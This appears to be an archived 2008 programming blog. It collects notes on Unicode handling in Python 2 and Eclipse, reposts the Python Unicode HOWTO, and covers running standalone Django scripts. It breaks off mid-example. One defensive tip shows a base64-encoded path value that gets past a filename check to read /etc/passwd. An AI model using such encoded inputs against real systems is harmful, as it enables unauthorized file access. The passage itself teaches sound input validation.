Tuesday, November 4, 2008

Unicode|Setting Default Text File Encoding in Eclipse

Setting Default Text File Encoding in Eclipse

I was recently working with a set of SQL migration scripts in Eclipse and started noticing that the localized characters weren't displaying correctly. I've seen all kinds of chaos in my projects with different file encodings creeping into the sources and database. So I did some looking and found that Eclipse was defaulting to Cp1252 for the encoding, which was why my files weren't displaying properly. I went into Window->Preferences..., opened General->Workspace, and changed the Text file encoding setting to UTF-8. Now all is good again.

Monday, November 3, 2008

Unicode|Screen Cast

http://farmdev.com/talks/unicode/

Sunday, November 2, 2008

Unicode|Common problem and resolution

UnicodeDecodeError: 'ascii' codec can't decode byte 0xa0 in position 10: ordinal not in range(128)

Jeff Epler jepler at unpythonic.net
Fri Oct 8 01:54:13 CEST 2004
If you compare a unicode string to a byte string, and the byte-string
has byte values >127, you will get an error like this:
>>> u'a' == '\xc0'
Traceback (most recent call last):
File "<stdin>", line 1, in ?
UnicodeDecodeError: 'ascii' codec can't decode byte 0xc0 in position 0: ordinal not in range(128)

There is no sensible way for Python to perform this comparison, because
the byte string '\xc0' could be in any encoding. If the encoding of the
byte string is latin-1, it's LATIN CAPITAL LETTER A WITH GRAVE. If it's
koi8-r encoded, it's CYRILLIC SMALL LETTER YU. Python refuses to guess
in this case.

It doesn't matter whether the unicode string contains any characters
that are non-ASCII characters.

To correct your function, you'll have to know what encoding the byte
string is in, and convert it to unicode using the decode() method,
and compare that result to the unicode string.

Jeff
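Jeff's fix is easy to sketch: decode the byte string with its known encoding, then compare Unicode to Unicode. A minimal illustration (the Latin-1 assumption here is mine, not from the original post):

```python
byte_string = b'\xc0'       # Latin-1 bytes; we must *know* this is Latin-1
unicode_string = u'\xc0'    # LATIN CAPITAL LETTER A WITH GRAVE

# Decode explicitly with the known encoding, then compare.
decoded = byte_string.decode('latin-1')
assert decoded == unicode_string
```

Comparing `byte_string == unicode_string` directly would trigger the implicit ASCII decode and fail; the explicit decode makes the programmer's assumption about the encoding visible.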

Unicode|Unicode HOWTO

Unicode HOWTO

Version 1.02

This HOWTO discusses Python's support for Unicode, and explains various problems that people commonly encounter when trying to work with Unicode.

Introduction to Unicode

History of Character Codes

In 1968, the American Standard Code for Information Interchange, better known by its acronym ASCII, was standardized. ASCII defined numeric codes for various characters, with the numeric values running from 0 to 127. For example, the lowercase letter 'a' is assigned 97 as its code value.

ASCII was an American-developed standard, so it only defined unaccented characters. There was an 'e', but no 'é' or 'Í'. This meant that languages which required accented characters couldn't be faithfully represented in ASCII. (Actually the missing accents matter for English, too, which contains words such as 'naïve' and 'café', and some publications have house styles which require spellings such as 'coöperate'.)

For a while people just wrote programs that didn't display accents. I remember looking at Apple ][ BASIC programs, published in French-language publications in the mid-1980s, that had lines like these:

PRINT "FICHIER EST COMPLETE."
PRINT "CARACTERE NON ACCEPTE."

Those messages should contain accents, and they just look wrong to someone who can read French.

In the 1980s, almost all personal computers were 8-bit, meaning that bytes could hold values ranging from 0 to 255. ASCII codes only went up to 127, so some machines assigned values between 128 and 255 to accented characters. Different machines had different codes, however, which led to problems exchanging files. Eventually various commonly used sets of values for the 128-255 range emerged. Some were true standards, defined by the International Standards Organization, and some were de facto conventions that were invented by one company or another and managed to catch on.

255 characters aren't very many. For example, you can't fit both the accented characters used in Western Europe and the Cyrillic alphabet used for Russian into the 128-255 range because there are more than 127 such characters.

You could write files using different codes (all your Russian files in a coding system called KOI8, all your French files in a different coding system called Latin1), but what if you wanted to write a French document that quotes some Russian text? In the 1980s people began to want to solve this problem, and the Unicode standardization effort began.

Unicode started out using 16-bit characters instead of 8-bit characters. 16 bits means you have 2^16 = 65,536 distinct values available, making it possible to represent many different characters from many different alphabets; an initial goal was to have Unicode contain the alphabets for every single human language. It turns out that even 16 bits isn't enough to meet that goal, and the modern Unicode specification uses a wider range of codes, 0-1,114,111 (0x10ffff in base-16).

There's a related ISO standard, ISO 10646. Unicode and ISO 10646 were originally separate efforts, but the specifications were merged with the 1.1 revision of Unicode.

(This discussion of Unicode's history is highly simplified. I don't think the average Python programmer needs to worry about the historical details; consult the Unicode consortium site listed in the References for more information.)

Definitions

A character is the smallest possible component of a text. 'A', 'B', 'C', etc., are all different characters. So are 'È' and 'Í'. Characters are abstractions, and vary depending on the language or context you're talking about. For example, the symbol for ohms (Ω) is usually drawn much like the capital letter omega (Ω) in the Greek alphabet (they may even be the same in some fonts), but these are two different characters that have different meanings.

The Unicode standard describes how characters are represented by code points. A code point is an integer value, usually denoted in base 16. In the standard, a code point is written using the notation U+12ca to mean the character with value 0x12ca (4810 decimal). The Unicode standard contains a lot of tables listing characters and their corresponding code points:

0061    'a'; LATIN SMALL LETTER A
0062    'b'; LATIN SMALL LETTER B
0063    'c'; LATIN SMALL LETTER C
...
007B    '{'; LEFT CURLY BRACKET

Strictly, these definitions imply that it's meaningless to say 'this is character U+12ca'. U+12ca is a code point, which represents some particular character; in this case, it represents the character 'ETHIOPIC SYLLABLE WI'. In informal contexts, this distinction between code points and characters will sometimes be forgotten.

A character is represented on a screen or on paper by a set of graphical elements that's called a glyph. The glyph for an uppercase A, for example, is two diagonal strokes and a horizontal stroke, though the exact details will depend on the font being used. Most Python code doesn't need to worry about glyphs; figuring out the correct glyph to display is generally the job of a GUI toolkit or a terminal's font renderer.

Encodings

To summarize the previous section: a Unicode string is a sequence of code points, which are numbers from 0 to 0x10ffff. This sequence needs to be represented as a set of bytes (meaning, values from 0-255) in memory. The rules for translating a Unicode string into a sequence of bytes are called an encoding.

The first encoding you might think of is an array of 32-bit integers. In this representation, the string "Python" would look like this:

   P           y           t           h           o           n
0x50 00 00 00 79 00 00 00 74 00 00 00 68 00 00 00 6f 00 00 00 6e 00 00 00
   0  1  2  3  4  5  6  7  8  9 10 11 12 13 14 15 16 17 18 19 20 21 22 23

This representation is straightforward but using it presents a number of problems.

  1. It's not portable; different processors order the bytes differently.
  2. It's very wasteful of space. In most texts, the majority of the code points are less than 127, or less than 255, so a lot of space is occupied by zero bytes. The above string takes 24 bytes compared to the 6 bytes needed for an ASCII representation. Increased RAM usage doesn't matter too much (desktop computers have megabytes of RAM, and strings aren't usually that large), but expanding our usage of disk and network bandwidth by a factor of 4 is intolerable.
  3. It's not compatible with existing C functions such as strlen(), so a new family of wide string functions would need to be used.
  4. Many Internet standards are defined in terms of textual data, and can't handle content with embedded zero bytes.

Generally people don't use this encoding, choosing other encodings that are more efficient and convenient.

Encodings don't have to handle every possible Unicode character, and most encodings don't. For example, Python's default encoding is the 'ascii' encoding. The rules for converting a Unicode string into the ASCII encoding are simple; for each code point:

  1. If the code point is <128, each byte is the same as the value of the code point.
  2. If the code point is 128 or greater, the Unicode string can't be represented in this encoding. (Python raises a UnicodeEncodeError exception in this case.)

Latin-1, also known as ISO-8859-1, is a similar encoding. Unicode code points 0-255 are identical to the Latin-1 values, so converting to this encoding simply requires converting code points to byte values; if a code point larger than 255 is encountered, the string can't be encoded into Latin-1.
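Both rules are easy to check interactively; this quick sketch (not from the original HOWTO) shows the one-byte-per-code-point property of Latin-1 and the failure for code points above 255:

```python
s = u'caf\xe9'                             # 'café'; U+00E9 is below 256
assert s.encode('latin-1') == b'caf\xe9'   # each code point becomes one byte

try:
    u'\u4500'.encode('latin-1')            # code point > 255
except UnicodeEncodeError:
    print('not representable in Latin-1')
```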

Encodings don't have to be simple one-to-one mappings like Latin-1. Consider IBM's EBCDIC, which was used on IBM mainframes. Letter values weren't in one block: 'a' through 'i' had values from 129 to 137, but 'j' through 'r' were 145 through 153. If you wanted to use EBCDIC as an encoding, you'd probably use some sort of lookup table to perform the conversion, but this is largely an internal detail.
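Python actually ships an EBCDIC codec ('cp500'), so the non-contiguous letter blocks can be observed directly; this check is my addition, not part of the HOWTO:

```python
# EBCDIC places 'a'..'i' at 129..137 but 'j'..'r' at 145..153.
assert u'a'.encode('cp500') == b'\x81'   # 129
assert u'i'.encode('cp500') == b'\x89'   # 137
assert u'j'.encode('cp500') == b'\x91'   # 145, not 138
```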

UTF-8 is one of the most commonly used encodings. UTF stands for "Unicode Transformation Format", and the '8' means that 8-bit numbers are used in the encoding. (There's also a UTF-16 encoding, but it's less frequently used than UTF-8.) UTF-8 uses the following rules:

  1. If the code point is <128, it's represented by the corresponding byte value.
  2. If the code point is between 128 and 0x7ff, it's turned into two byte values between 128 and 255.
  3. Code points >0x7ff are turned into three- or four-byte sequences, where each byte of the sequence is between 128 and 255.

UTF-8 has several convenient properties:

  1. It can handle any Unicode code point.
  2. A Unicode string is turned into a string of bytes containing no embedded zero bytes. This avoids byte-ordering issues, and means UTF-8 strings can be processed by C functions such as strcpy() and sent through protocols that can't handle zero bytes.
  3. A string of ASCII text is also valid UTF-8 text.
  4. UTF-8 is fairly compact; the majority of code points are turned into two bytes, and values less than 128 occupy only a single byte.
  5. If bytes are corrupted or lost, it's possible to determine the start of the next UTF-8-encoded code point and resynchronize. It's also unlikely that random 8-bit data will look like valid UTF-8.
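Properties 1, 3, and 4 are easy to demonstrate with a short sketch (my example, not the HOWTO's): ASCII text encodes to itself, and the number of bytes grows with the code point, following rules 1-3 above.

```python
# ASCII text is already valid UTF-8.
assert u'abc'.encode('utf-8') == b'abc'

# Byte length grows with the code point.
assert len(u'\xe9'.encode('utf-8')) == 2      # U+00E9: two bytes
assert len(u'\u20ac'.encode('utf-8')) == 3    # U+20AC EURO SIGN: three bytes
```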

References

The Unicode Consortium site at <http://www.unicode.org> has character charts, a glossary, and PDF versions of the Unicode specification. Be prepared for some difficult reading. <http://www.unicode.org/history/> is a chronology of the origin and development of Unicode.

To help understand the standard, Jukka Korpela has written an introductory guide to reading the Unicode character tables, available at <http://www.cs.tut.fi/~jkorpela/unicode/guide.html>.

Roman Czyborra wrote another explanation of Unicode's basic principles; it's at <http://czyborra.com/unicode/characters.html>. Czyborra has written a number of other Unicode-related documents, available from <http://www.czyborra.com>.

Two other good introductory articles were written by Joel Spolsky <http://www.joelonsoftware.com/articles/Unicode.html> and Jason Orendorff <http://www.jorendorff.com/articles/unicode/>. If this introduction didn't make things clear to you, you should try reading one of these alternate articles before continuing.

Wikipedia entries are often helpful; see the entries for "character encoding" <http://en.wikipedia.org/wiki/Character_encoding> and UTF-8 <http://en.wikipedia.org/wiki/UTF-8>, for example.

Python's Unicode Support

Now that you've learned the rudiments of Unicode, we can look at Python's Unicode features.

The Unicode Type

Unicode strings are expressed as instances of the unicode type, one of Python's repertoire of built-in types. It derives from an abstract type called basestring, which is also an ancestor of the str type; you can therefore check if a value is a string type with isinstance(value, basestring). Under the hood, Python represents Unicode strings as either 16- or 32-bit integers, depending on how the Python interpreter was compiled.

The unicode() constructor has the signature unicode(string[, encoding, errors]). All of its arguments should be 8-bit strings. The first argument is converted to Unicode using the specified encoding; if you leave off the encoding argument, the ASCII encoding is used for the conversion, so characters greater than 127 will be treated as errors:

>>> unicode('abcdef')
u'abcdef'
>>> s = unicode('abcdef')
>>> type(s)
<type 'unicode'>
>>> unicode('abcdef' + chr(255))
Traceback (most recent call last):
File "<stdin>", line 1, in ?
UnicodeDecodeError: 'ascii' codec can't decode byte 0xff in position 6:
ordinal not in range(128)

The errors argument specifies the response when the input string can't be converted according to the encoding's rules. Legal values for this argument are 'strict' (raise a UnicodeDecodeError exception), 'replace' (add U+FFFD, 'REPLACEMENT CHARACTER'), or 'ignore' (just leave the character out of the Unicode result). The following examples show the differences:

>>> unicode('\x80abc', errors='strict')
Traceback (most recent call last):
File "<stdin>", line 1, in ?
UnicodeDecodeError: 'ascii' codec can't decode byte 0x80 in position 0:
ordinal not in range(128)
>>> unicode('\x80abc', errors='replace')
u'\ufffdabc'
>>> unicode('\x80abc', errors='ignore')
u'abc'

Encodings are specified as strings containing the encoding's name. Python 2.4 comes with roughly 100 different encodings; see the Python Library Reference at <http://docs.python.org/lib/standard-encodings.html> for a list. Some encodings have multiple names; for example, 'latin-1', 'iso_8859_1' and '8859' are all synonyms for the same encoding.

One-character Unicode strings can also be created with the unichr() built-in function, which takes integers and returns a Unicode string of length 1 that contains the corresponding code point. The reverse operation is the built-in ord() function that takes a one-character Unicode string and returns the code point value:

>>> unichr(40960)
u'\ua000'
>>> ord(u'\ua000')
40960

Instances of the unicode type have many of the same methods as the 8-bit string type for operations such as searching and formatting:

>>> s = u'Was ever feather so lightly blown to and fro as this multitude?'
>>> s.count('e')
5
>>> s.find('feather')
9
>>> s.find('bird')
-1
>>> s.replace('feather', 'sand')
u'Was ever sand so lightly blown to and fro as this multitude?'
>>> s.upper()
u'WAS EVER FEATHER SO LIGHTLY BLOWN TO AND FRO AS THIS MULTITUDE?'

Note that the arguments to these methods can be Unicode strings or 8-bit strings. 8-bit strings will be converted to Unicode before carrying out the operation; Python's default ASCII encoding will be used, so characters greater than 127 will cause an exception:

>>> s.find('Was\x9f')
Traceback (most recent call last):
File "<stdin>", line 1, in ?
UnicodeDecodeError: 'ascii' codec can't decode byte 0x9f in position 3: ordinal not in range(128)
>>> s.find(u'Was\x9f')
-1

Much Python code that operates on strings will therefore work with Unicode strings without requiring any changes to the code. (Input and output code needs more updating for Unicode; more on this later.)

Another important method is .encode([encoding], [errors='strict']), which returns an 8-bit string version of the Unicode string, encoded in the requested encoding. The errors parameter is the same as the parameter of the unicode() constructor, with one additional possibility; as well as 'strict', 'ignore', and 'replace', you can also pass 'xmlcharrefreplace' which uses XML's character references. The following example shows the different results:

>>> u = unichr(40960) + u'abcd' + unichr(1972)
>>> u.encode('utf-8')
'\xea\x80\x80abcd\xde\xb4'
>>> u.encode('ascii')
Traceback (most recent call last):
File "<stdin>", line 1, in ?
UnicodeEncodeError: 'ascii' codec can't encode character u'\ua000' in position 0: ordinal not in range(128)
>>> u.encode('ascii', 'ignore')
'abcd'
>>> u.encode('ascii', 'replace')
'?abcd?'
>>> u.encode('ascii', 'xmlcharrefreplace')
'&#40960;abcd&#1972;'

Python's 8-bit strings have a .decode([encoding], [errors]) method that interprets the string using the given encoding:

>>> u = unichr(40960) + u'abcd' + unichr(1972)   # Assemble a string
>>> utf8_version = u.encode('utf-8') # Encode as UTF-8
>>> type(utf8_version), utf8_version
(<type 'str'>, '\xea\x80\x80abcd\xde\xb4')
>>> u2 = utf8_version.decode('utf-8') # Decode using UTF-8
>>> u == u2 # The two strings match
True

The low-level routines for registering and accessing the available encodings are found in the codecs module. However, the encoding and decoding functions returned by this module are usually more low-level than is comfortable, so I'm not going to describe the codecs module here. If you need to implement a completely new encoding, you'll need to learn about the codecs module interfaces, but implementing encodings is a specialized task that also won't be covered here. Consult the Python documentation to learn more about this module.

The most commonly used part of the codecs module is the codecs.open() function which will be discussed in the section on input and output.

Unicode Literals in Python Source Code

In Python source code, Unicode literals are written as strings prefixed with the 'u' or 'U' character: u'abcdefghijk'. Specific code points can be written using the \u escape sequence, which is followed by four hex digits giving the code point. The \U escape sequence is similar, but expects 8 hex digits, not 4.

Unicode literals can also use the same escape sequences as 8-bit strings, including \x, but \x only takes two hex digits so it can't express an arbitrary code point. Octal escapes can go up to U+01ff, which is octal 777.

>>> s = u"a\xac\u1234\u20ac\U00008000"
           ^^^^ two-digit hex escape
               ^^^^^^ four-digit Unicode escape
                           ^^^^^^^^^^ eight-digit Unicode escape
>>> for c in s: print ord(c),
...
97 172 4660 8364 32768

Using escape sequences for code points greater than 127 is fine in small doses, but becomes an annoyance if you're using many accented characters, as you would in a program with messages in French or some other accent-using language. You can also assemble strings using the unichr() built-in function, but this is even more tedious.

Ideally, you'd want to be able to write literals in your language's natural encoding. You could then edit Python source code with your favorite editor which would display the accented characters naturally, and have the right characters used at runtime.

Python supports writing Unicode literals in any encoding, but you have to declare the encoding being used. This is done by including a special comment as either the first or second line of the source file:

#!/usr/bin/env python
# -*- coding: latin-1 -*-

u = u'abcdé'
print ord(u[-1])

The syntax is inspired by Emacs's notation for specifying variables local to a file. Emacs supports many different variables, but Python only supports 'coding'. The -*- symbols indicate that the comment is special; within them, you must supply the name coding and the name of your chosen encoding, separated by ':'.

If you don't include such a comment, the default encoding used will be ASCII. Versions of Python before 2.4 were Euro-centric and assumed Latin-1 as a default encoding for string literals; in Python 2.4, characters greater than 127 still work but result in a warning. For example, the following program has no encoding declaration:

#!/usr/bin/env python
u = u'abcdé'
print ord(u[-1])

When you run it with Python 2.4, it will output the following warning:

amk:~$ python p263.py
sys:1: DeprecationWarning: Non-ASCII character '\xe9'
in file p263.py on line 2, but no encoding declared;
see http://www.python.org/peps/pep-0263.html for details

Unicode Properties

The Unicode specification includes a database of information about code points. For each code point that's defined, the information includes the character's name, its category, the numeric value if applicable (Unicode has characters representing the Roman numerals and fractions such as one-third and four-fifths). There are also properties related to the code point's use in bidirectional text and other display-related properties.

The following program displays some information about several characters, and prints the numeric value of one particular character:

import unicodedata

u = unichr(233) + unichr(0x0bf2) + unichr(3972) + unichr(6000) + unichr(13231)

for i, c in enumerate(u):
    print i, '%04x' % ord(c), unicodedata.category(c),
    print unicodedata.name(c)

# Get numeric value of second character
print unicodedata.numeric(u[1])

When run, this prints:

0 00e9 Ll LATIN SMALL LETTER E WITH ACUTE
1 0bf2 No TAMIL NUMBER ONE THOUSAND
2 0f84 Mn TIBETAN MARK HALANTA
3 1770 Lo TAGBANWA LETTER SA
4 33af So SQUARE RAD OVER S SQUARED
1000.0

The category codes are abbreviations describing the nature of the character. These are grouped into categories such as "Letter", "Number", "Punctuation", or "Symbol", which in turn are broken up into subcategories. To take the codes from the above output, 'Ll' means 'Letter, lowercase', 'No' means "Number, other", 'Mn' is "Mark, nonspacing", and 'So' is "Symbol, other". See <http://www.unicode.org/Public/UNIDATA/UCD.html#General_Category_Values> for a list of category codes.
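A quick way to get a feel for the categories is to query unicodedata directly; this small sketch is my addition (the output format is arbitrary):

```python
import unicodedata

# Print code point and category for a few sample characters:
# 'a' is Ll (Letter, lowercase), '3' is Nd (Number, decimal digit),
# '!' is Po (Punctuation, other), and U+00E9 is Ll again.
for ch in u'a3!\xe9':
    print('U+%04x %s' % (ord(ch), unicodedata.category(ch)))
```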

References

The Unicode and 8-bit string types are described in the Python library reference at <http://docs.python.org/lib/typesseq.html>.

The documentation for the unicodedata module is at <http://docs.python.org/lib/module-unicodedata.html>.

The documentation for the codecs module is at <http://docs.python.org/lib/module-codecs.html>.

Marc-André Lemburg gave a presentation at EuroPython 2002 titled "Python and Unicode". A PDF version of his slides is available at <http://www.egenix.com/files/python/Unicode-EPC2002-Talk.pdf>, and is an excellent overview of the design of Python's Unicode features.

Reading and Writing Unicode Data

Once you've written some code that works with Unicode data, the next problem is input/output. How do you get Unicode strings into your program, and how do you convert Unicode into a form suitable for storage or transmission?

It's possible that you may not need to do anything depending on your input sources and output destinations; you should check whether the libraries used in your application support Unicode natively. XML parsers often return Unicode data, for example. Many relational databases also support Unicode-valued columns and can return Unicode values from an SQL query.

Unicode data is usually converted to a particular encoding before it gets written to disk or sent over a socket. It's possible to do all the work yourself: open a file, read an 8-bit string from it, and convert the string with unicode(str, encoding). However, the manual approach is not recommended.

One problem is the multi-byte nature of encodings; one Unicode character can be represented by several bytes. If you want to read the file in arbitrary-sized chunks (say, 1K or 4K), you need to write error-handling code to catch the case where only part of the bytes encoding a single Unicode character are read at the end of a chunk. One solution would be to read the entire file into memory and then perform the decoding, but that prevents you from working with files that are extremely large; if you need to read a 2Gb file, you need 2Gb of RAM. (More, really, since for at least a moment you'd need to have both the encoded string and its Unicode version in memory.)

The solution would be to use the low-level decoding interface to catch the case of partial coding sequences. The work of implementing this has already been done for you: the codecs module includes a version of the open() function that returns a file-like object that assumes the file's contents are in a specified encoding and accepts Unicode parameters for methods such as .read() and .write().

The function's parameters are open(filename, mode='rb', encoding=None, errors='strict', buffering=1). mode can be 'r', 'w', or 'a', just like the corresponding parameter to the regular built-in open() function; add a '+' to update the file. buffering is similarly parallel to the standard function's parameter. encoding is a string giving the encoding to use; if it's left as None, a regular Python file object that accepts 8-bit strings is returned. Otherwise, a wrapper object is returned, and data written to or read from the wrapper object will be converted as needed. errors specifies the action for encoding errors and can be one of the usual values of 'strict', 'ignore', and 'replace'.

Reading Unicode from a file is therefore simple:

import codecs
f = codecs.open('unicode.rst', encoding='utf-8')
for line in f:
    print repr(line)

It's also possible to open files in update mode, allowing both reading and writing:

f = codecs.open('test', encoding='utf-8', mode='w+')
f.write(u'\u4500 blah blah blah\n')
f.seek(0)
print repr(f.readline()[:1])
f.close()

Unicode character U+FEFF is used as a byte-order mark (BOM), and is often written as the first character of a file in order to assist with autodetection of the file's byte ordering. Some encodings, such as UTF-16, expect a BOM to be present at the start of a file; when such an encoding is used, the BOM will be automatically written as the first character and will be silently dropped when the file is read. There are variants of these encodings, such as 'utf-16-le' and 'utf-16-be' for little-endian and big-endian encodings, that specify one particular byte ordering and don't skip the BOM.
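The BOM behaviour can be seen without touching a file, since it applies to the codecs themselves; a short check (my example, not from the HOWTO):

```python
import codecs

# The generic 'utf-16' codec writes a BOM automatically.
data = u'abc'.encode('utf-16')
assert data[:2] in (codecs.BOM_UTF16_LE, codecs.BOM_UTF16_BE)

# The endian-specific variant fixes the byte order and omits the BOM.
assert u'abc'.encode('utf-16-le') == b'a\x00b\x00c\x00'
```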

Unicode filenames

Most of the operating systems in common use today support filenames that contain arbitrary Unicode characters. Usually this is implemented by converting the Unicode string into some encoding that varies depending on the system. For example, MacOS X uses UTF-8 while Windows uses a configurable encoding; on Windows, Python uses the name "mbcs" to refer to whatever the currently configured encoding is. On Unix systems, there will only be a filesystem encoding if you've set the LANG or LC_CTYPE environment variables; if you haven't, the default encoding is ASCII.

The sys.getfilesystemencoding() function returns the encoding to use on your current system, in case you want to do the encoding manually, but there's not much reason to bother. When opening a file for reading or writing, you can usually just provide the Unicode string as the filename, and it will be automatically converted to the right encoding for you:

filename = u'filename\u4500abc'
f = open(filename, 'w')
f.write('blah\n')
f.close()

Functions in the os module such as os.stat() will also accept Unicode filenames.

os.listdir(), which returns filenames, raises an issue: should it return the Unicode version of filenames, or should it return 8-bit strings containing the encoded versions? os.listdir() will do both, depending on whether you provided the directory path as an 8-bit string or a Unicode string. If you pass a Unicode string as the path, filenames will be decoded using the filesystem's encoding and a list of Unicode strings will be returned, while passing an 8-bit path will return the 8-bit versions of the filenames. For example, assuming the default filesystem encoding is UTF-8, running the following program:

fn = u'filename\u4500abc'
f = open(fn, 'w')
f.close()

import os
print os.listdir('.')
print os.listdir(u'.')

will produce the following output:

amk:~$ python t.py
['.svn', 'filename\xe4\x94\x80abc', ...]
[u'.svn', u'filename\u4500abc', ...]

The first list contains UTF-8-encoded filenames, and the second list contains the Unicode versions.

Tips for Writing Unicode-aware Programs

This section provides some suggestions on writing software that deals with Unicode.

The most important tip is:

Software should only work with Unicode strings internally, converting to a particular encoding on output.

If you attempt to write processing functions that accept both Unicode and 8-bit strings, you will find your program vulnerable to bugs wherever you combine the two different kinds of strings. Python's default encoding is ASCII, so whenever a character with an ASCII value >127 is in the input data, you'll get a UnicodeDecodeError because that character can't be handled by the ASCII encoding.

It's easy to miss such problems if you only test your software with data that doesn't contain any accents; everything will seem to work, but there's actually a bug in your program waiting for the first user who attempts to use characters >127. A second tip, therefore, is:

Include characters >127 and, even better, characters >255 in your test data.

When using data coming from a web browser or some other untrusted source, a common technique is to check for illegal characters in a string before using the string in a generated command line or storing it in a database. If you're doing this, be careful to check the string once it's in the form that will be used or stored; it's possible for encodings to be used to disguise characters. This is especially true if the input data also specifies the encoding; many encodings leave the commonly checked-for characters alone, but Python includes some encodings such as 'base64' that modify every single character.

For example, let's say you have a content management system that takes a Unicode filename, and you want to disallow paths with a '/' character. You might write this code:

def read_file(filename, encoding):
    if '/' in filename:
        raise ValueError("'/' not allowed in filenames")
    unicode_name = filename.decode(encoding)
    f = open(unicode_name, 'r')
    # ... return contents of file ...

However, if an attacker could specify the 'base64' encoding, they could pass 'L2V0Yy9wYXNzd2Q=', which is the base-64 encoded form of the string '/etc/passwd', to read a system file. The above code looks for '/' characters in the encoded form and misses the dangerous character in the resulting decoded form.
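One safer arrangement is to decode first and run the check on the decoded form. This sketch mirrors the function above but is my own reordering, not code from the original text:

```python
def read_file(filename, encoding):
    # Decode first, then validate the *decoded* form,
    # so encoding tricks such as base64 can't hide a '/'.
    unicode_name = filename.decode(encoding)
    if u'/' in unicode_name:
        raise ValueError("'/' not allowed in filenames")
    f = open(unicode_name, 'r')
    return f.read()
```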

References

The PDF slides for Marc-André Lemburg's presentation "Writing Unicode-aware Applications in Python" are available at <http://www.egenix.com/files/python/LSM2005-Developing-Unicode-aware-applications-in-Python.pdf> and discuss questions of character encodings as well as how to internationalize and localize an application.

Revision History and Acknowledgements

Thanks to the following people who have noted errors or offered suggestions on this article: Nicholas Bastin, Marius Gedminas, Kent Johnson, Ken Krugler, Marc-André Lemburg, Martin von Löwis, Chad Whitacre.

Version 1.0: posted August 5 2005.

Version 1.01: posted August 7 2005. Corrects factual and markup errors; adds several links.

Version 1.02: posted August 16 2005. Corrects factual errors.

Monday, October 27, 2008

Django|python path

Setting Django Environment Variables in a Python Script

Posted: July 15, 2007
Author: Scott Newman
Category: Python, Django

When running Python programs to interact with the Django API, you don't always have the PYTHONPATH and DJANGO_SETTINGS_MODULE defined.

Before I learned this trick, I used to put my programs inside shell scripts that exported the path and settings variables before running the program. Crude, but effective.

One important thing to remember: If you're using the Django API, you must put these steps in before you try to import any Django elements (views, models, etc.)

To set environment variables:

import os

os.environ['PYTHONPATH'] = '/home/code'
os.environ['DJANGO_SETTINGS_MODULE'] = 'myproject.settings'

To add locations to the search path:

import sys

sys.path.insert(0, '/home/code')  # or sys.path.append('/home/code') to search it last

You can view the search path and environment variables like this:

import sys, os

print sys.path
print os.environ.keys()

Further Reading

Dive Into Python, Chapter 2.4.1. The Import Search Path
http://www.diveintopython.org/getting_to_know_python/everything_is_an_object.html#d0e4550

Python Library Reference, Chapter 14.1.1 Process Parameters
http://docs.python.org/lib/os-procinfo.html

Django|Standalone Django scripts

Standalone Django scripts

An entry published by James Bennett on September 22, 2007, Part of the category Django. Nine comments posted.

In the grand tradition of providing answers to frequently-asked questions from the django-users mailing list and the #django IRC channel, I’d like to tackle something that’s fast becoming the most frequently-asked question: how do you write standalone scripts which make use of Django components?

At first glance, this isn’t a terribly hard thing to do: Django’s just plain Python, and all of its components can — in theory — be imported and used just like any other Python modules. But the thing that trips most people up is the need, in most parts of Django, to supply some settings Django can use so it’ll know things like which database to connect to, which applications are available, where it can find templates, etc.

Depending on exactly what you need to do, there are several ways you can approach this problem, so let’s run through each of them in turn.

Set DJANGO_SETTINGS_MODULE before you run

The simplest method is to simply assign a value to the DJANGO_SETTINGS_MODULE environment variable before you run your script, and that’s not terribly hard to do if you understand a little bit about how environment variables work. On most Unix-based systems (including Linux and Mac OS X), you can typically do this with the export command of the standard shell:

export DJANGO_SETTINGS_MODULE=yoursite.settings

Then you can just run any scripts which rely on Django settings, and they’ll work properly. If you’re using a different shell, or if you’re on Windows, the exact command to type will be slightly different, but the idea is the same.

One extremely useful application of this is in a crontab file; cron lets you set and change environment variables with ease, so you can have things like this in your crontab:

# Cron jobs for foo.com run at 3AM

DJANGO_SETTINGS_MODULE=foo.settings

0 3 * * * python /path/to/maintenance/script.py
30 3 * * * python /path/to/other/script.py

# Cron jobs for bar.com run at 4AM

DJANGO_SETTINGS_MODULE=bar.settings

0 4 * * * python /path/to/maintenance/script.py
30 4 * * * python /path/to/other/script.py

This is pretty much exactly what the crontab files on our servers at World Online look like, and in general this is the cleanest way to handle scripts which use Django components and need to run as cron jobs.

Use setup_environ()

Back in May, Jared Kuolt wrote up this technique, which is exactly how Django’s own manage.py script handles settings: the function setup_environ() in django.core.management will, given a Python module containing Django settings, handle all the business of (appropriately for its name) setting up your environment for you:

from django.core.management import setup_environ
from mysite import settings

setup_environ(settings)

Below the setup_environ() line, you can make use of any Django component and rest assured that the proper settings will be available for it.

The only real disadvantage to this is that you lose some flexibility: by tying the script to a particular settings module, you’re also tying it to a particular Django project, and if you later want to re-use it you’ll have to make a copy and change the import to point at another project’s settings file, or find a different way to configurably accept the settings to use (we’ll look at that again in a moment). If all you need is a one-off script for a particular project, though, this is an awfully handy way to set it up.

Use settings.configure()

For cases where you don’t want or need the overhead of a full Django settings file, Django provides a standalone method for configuring only the settings you need, and without needing to use DJANGO_SETTINGS_MODULE: the configure() method of the LazySettings class in django.conf (django.conf.settings is always an instance of LazySettings, which is used to ensure that settings aren’t accessed until they’re actually needed). There’s official documentation for this, and it’s fairly easy to follow along and use it in your own scripts:

from django.conf import settings

settings.configure(TEMPLATE_DIRS=('/path/to/template_dir',), DEBUG=False,
                   TEMPLATE_DEBUG=False)

And then below the configure() line you’d be able to make use of Django’s template system as normal (because the appropriate settings for it have been provided). This technique is also handy because for any “missing” settings you didn’t configure it will fill in automatic default values (see Django’s settings documentation for coverage of the default values for each setting), or you can pass a settings module in the default_settings keyword argument to configure() to provide your own custom defaults.

Like setup_environ(), this method does tie you down to a particular combination of settings, but again this isn’t necessarily a problem: it’s fairly common to have project-specific scripts which won’t need to be re-used and rely on some values particular to that project.

Accept settings on the command line

We’ve seen that setup_environ() and settings.configure() both seem to tie you to a particular settings module or combination of manually-provided settings, and while that’s not always a bad thing it presents a major stumbling block to reusable applications. Setting DJANGO_SETTINGS_MODULE (as seen above in the context of a crontab) is much more flexible, but can be somewhat tedious to do over and over again. So why don’t we come up with a method that lets you specify the settings to use when you call the script?

As it turns out, this is extremely easy to do; I think the technique doesn’t get a lot of attention because most newcomers to Django don’t yet know their way around Python’s standard library and so don’t stumble across the module which makes it all simple: optparse. In a nutshell, optparse provides an easy way to write scripts which take traditional Unix-style command line arguments, and to get those arguments translated into appropriate Python values.

A simple example would look like this:

import os
from optparse import OptionParser

usage = "usage: %prog -s SETTINGS | --settings=SETTINGS"
parser = OptionParser(usage)
